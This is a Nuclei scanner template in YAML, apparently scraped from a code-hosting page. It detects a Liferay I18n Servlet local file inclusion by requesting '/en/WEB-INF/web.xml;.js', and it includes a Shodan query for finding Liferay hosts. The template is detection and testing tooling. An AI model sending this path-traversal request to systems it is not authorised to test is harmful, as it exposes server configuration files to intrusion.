47 lines
1.4 KiB
YAML
47 lines
1.4 KiB
YAML
id: liferay-resource-leak
|
|
|
|
info:
|
|
name: Liferay - Local File Inclusion
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
Liferay is vulnerable to local file inclusion in the I18n Servlet because it leaks information via sending an HTTP request to /[language]/[resource];.js (also .jsp works).
|
|
remediation: Update Liferay to the latest version
|
|
reference:
|
|
- https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"Liferay"
|
|
product: liferay_portal
|
|
vendor: liferay
|
|
tags: liferay,lfi,j2ee
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/en/WEB-INF/web.xml;.js"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<web-app id="
|
|
- "<?xml"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/xml"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100d9dfeed52809955676c0839f79317229f83602c693988aefe128d79464876d1902202fee56c8345c201de7b034a2a0e0515915e68ba66cbd0b16f6a005d442c40964:922c64590222798bb761d5b6d8e72950 |